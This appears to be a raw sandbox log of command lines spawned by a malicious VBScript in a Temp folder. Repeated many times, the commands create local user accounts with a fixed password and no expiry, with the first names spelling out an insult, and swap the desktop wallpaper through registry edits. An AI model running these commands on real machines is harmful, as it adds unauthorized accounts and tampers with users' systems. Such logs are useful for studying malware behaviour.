C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\net.exe
net user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\net.exe
net user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 941488320898 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 941488320898 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 18849574315444 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18849574315444 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user 26022636112598 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 26022636112598 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 214902539824108 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 214902539824108 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 13982042422066 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 13982042422066 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 248421527631217 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 248421527631217 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 21904155148759 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 21904155148759 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 1840380097177 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 1840380097177 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 18524648911123 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18524648911123 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 43871908525489 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 43871908525489 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 314021462413291 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 314021462413291 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\net.exe
net user 735291419152 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 735291419152 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 64093165125703 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 64093165125703 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 124422046724511 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 124422046724511 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 147862219226991 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 147862219226991 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 30027172512632 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 30027172512632 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user 203542707630234 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 203542707630234 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\net.exe
net user 135591157417569 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 135591157417569 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
